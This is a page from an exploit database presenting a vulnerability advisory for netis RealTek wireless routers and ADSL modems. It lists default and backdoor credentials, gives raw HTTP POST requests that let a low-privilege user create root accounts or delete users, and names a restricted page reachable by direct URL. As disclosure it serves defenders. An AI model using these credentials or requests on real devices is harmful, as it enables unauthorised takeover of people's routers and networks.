0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities] # Discovered by: Karn Ganeshen # Reported on: [October 13, 2015] # Vendor Response: [Vulnerability? What's this?] # Vendor Homepage: [www.netis-systems.com] # Version Affected: [Firmware version RTK v2.1.1] **Vulnerability Details** * 1. Default, weak passwords for http and ftp services * a. *HTTP accounts* - guest/guest - user/user - guest/XXXXairocon <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="guest"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x2"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="BACKDOOR" V="0x0"/> <V N="PRIORITY" V="0x0"/> </chain> <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> *XXXX -> last four digits of MAC address * b. *FTP accounts* - admin/admin - useradmin/useradmin - user/user <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="admin"/> <V N="PASSWORD" V="admin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x3"/> <V N="INSTNUM" V="0x1"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="useradmin"/> <V N="PASSWORD" V="useradmin"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x2"/> <V N="INSTNUM" V="0x2"/> </chain> <chain N="FTP_SERVER"> <V N="ENABLE" V="0x1"/> <V N="USERNAME" V="user"/> <V N="PASSWORD" V="user"/> <V N="PORT" V="0x15"/> <V N="USERRIGHT" V="0x1"/> <V N="INSTNUM" V="0x3"/> </chain> 2. *Backdoor accounts* The device comes configured with privileged, backdoor account. For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor account. This is seen in the config file: <chain N="USERNAME_PASSWORD"> <V N="FLAG" V="0x0"/> <V N="USERNAME" V="guest"/> <V N="PASSWORD" V="XXXXairocon"/> <V N="BACKDOOR" V="0x1"/> <V N="PRIORITY" V="0x1"/> </chain> This user is not shown / visible in the user list when logged in as guest (privileged user). 3. *No CSRF protection* There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in. 4. *Weak RBAC controls * 5a) *A non-root/non-admin user (user) can create and delete any other users, including root-privileged accounts. * In netis RealTek wireless router ADSL modem, there are three users: guest:guest -> priv 2 is super user account with full functional access user:user -> priv 0 -> can access only some functions guest:XXXXairocon -> privileged backdoor login *Normally: * - user can create new account with restricted user privs only. - user can change its password and only other non-root users. - user can delete any other non-root users. However, the application does not enforce strict rbac and it is possible for a non-root user to create a new user with root privileges. This is done as follows: 1. Start creating a new user, and intercepting the user creation POST request 2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) - Submit request 3. When the new root user is created successfully, it does not show up in user list 4. Confirm via logging in as new root, and / or configured accounts in configuration file (config.img) This is the POST request to create a new user: *Create user http request*: POST /form2userconfig.cgi HTTP/1.1 Host: <IP> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm?v= Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 115 username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm= *Note1*: In some cases, this password change function is not accessible to 'user' via GUI. But we can still send a POST request to create a valid, new root privileged account. *Note2*: In some cases, application does not create root priv user, in the first attempt. However, in the 2nd or 3rd attempt, new user is created without any issue. *Delete user http request:* A non-root/non-admin user can delete any configured user(s) including privileged users (guest). POST /form2userconfig.cgi HTTP/1.1 Host: <ip> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://<IP>/userconfig.htm Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm% In case (non-root) user is deleting a root login (guest, priv 2), action status can be confirmed by checking the configuration In case (non-root) user is deleting a user login (priv 0), action status can be confirmed by checking the user list. 5b) *(non-root priv) User can access unauthorized functions.* Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly: http://<IP>/fw-macfilter.htm Other functions may also be accessible in this manner. 6. *Sensitive information not secured from low privileged users * A non-root / non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access. # 0day.today [2024-10-05] #